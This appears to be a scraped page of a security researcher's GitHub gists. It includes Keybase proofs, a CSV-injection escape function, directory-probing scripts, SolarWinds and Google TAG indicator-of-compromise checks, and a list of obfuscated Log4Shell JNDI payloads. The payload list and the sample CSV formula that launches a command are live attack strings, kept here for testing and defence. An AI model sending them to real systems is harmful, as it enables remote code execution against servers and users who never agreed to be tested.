ZephrFish

### Keybase proof

I hereby claim:

  * I am ZephrFish on github.
  * I am zephrfish (https://keybase.io/zephrfish) on keybase.
  * I have a public key whose fingerprint is EC67 4DC5 F2F0 87E5 598B  B920 ED66 4E92 D071 41CA

To claim this, I am signing this object:

ZephrFish

def escape_csv(payload):
    if payload[0] in ('@','+','-', '=', '|'):
            payload = "'" + payload
            payload = payload.replace("|", "\|")
    return payload

# Example
payload = "@cmd|' /C calc'!A0"
print("The Unescaped version is: " + payload)
print("When passed though escape function the value is: " + escape_csv(payload))

ZephrFish

Keybase proof

I hereby claim:

• I am ZephrFish on github.
• I am zephrfish (https://keybase.io/zephrfish) on keybase.
• I have a public key whose fingerprint is FADA 204E 6BAE 1870 E42F D105 0DD0 B1CC 7DF5 ADC0

To claim this, I am signing this object:

ZephrFish

<html>
<head>
<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
<link rel="stylesheet" type="text/css" href="css/custom.css">
<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>
<title>Application Loader ZSEC-Net</title>
<style>
.ad-left {

ZephrFish

# Dir Checker
# Prints out URLs and Paths together
import itertools
import sys

def dirprint(urls, paths):
    x = open(urls).read().split("\n")
    y = open(paths).read().split("\n")
    for a, b in itertools.product(x, y):
        print("{}/{}".format(a, b))

ZephrFish

import requests
import sys
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def quickWin(url, paths):
    with open(paths, 'r') as f:
        for path in f.read().splitlines():

ZephrFish

// Solarwinds Orion Hashes of Known Malicious IoCs
 
Sha256: 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134
Sha1: 2f1a5a7411d015d01aaee4535835400191645023 
 
Sha256: ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 
Sha1: d130bd75645c2433f88ac03e73395fba172ef676
 
Sha256: 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77
Sha1: 76640508b1e7759e548771a5359eaed353bf1eec

ZephrFish

-7n
-9s
-er7kj
-gn
-jc5pe
-jlowd
-ka25u
-lxwg8exljmcqy
-wwgi2xnl
-xhi7z

ZephrFish

# Checks the registry for IOCs from https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
# If not vulnerable should return "ERROR: The system was unable to find the specified registry key or value."
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig"
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update"

# Checks the paths of IOCs from https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
# If not vulnerable each will return false
Test-Path C:\Windows\System32\Nwsapagent.sys     
Test-Path C:\Windows\System32\helpsvc.sys        

ZephrFish

${jndi:ldap://127.0.0.1:1389/ badClassName} 
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} 
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} 
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} 
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} 
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} 
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}